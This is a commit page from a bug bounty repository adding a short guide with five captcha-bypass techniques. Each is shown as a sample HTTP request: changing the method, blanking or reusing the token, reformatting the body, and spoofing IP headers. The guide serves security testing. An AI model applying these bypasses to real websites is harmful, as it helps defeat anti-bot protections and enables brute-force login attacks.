ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 18:36:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Bypass Captcha [1]

Browse Source 
Create bypass captcha tips and add 5 tips
This commit is contained in:
Muhammad Daffa 2020-09-16 10:00:24 +07:00 committed by GitHub
parent 74b4c4b2eb
commit c972fd33ce
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 59 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

59
BypassCaptcha.md Normal file
View File

@ -0,0 +1,59 @@
# Bypass Captcha
1. Try changing the request method, for example POST to GET
```
POST / HTTP 1.1
Host: target.com
[...]
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
```
Change the method to GET
```
GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
Host: target.com
[...]
```
2. Try remove the value of the captcha parameter
```
POST / HTTP 1.1
Host: target.com
[...]
_RequestVerificationToken=&_Username=daffa&_Password=test123
```
3. Try reuse old captcha token
```
POST / HTTP 1.1
Host: target.com
[...]
_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
```
4. Convert JSON data to normal request parameter
```
POST / HTTP 1.1
Host: target.com
[...]
{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}
```
Convert to normal request
```
POST / HTTP 1.1
Host: target.com
[...]
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
```
5. Try custom header to bypass captcha
```
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
```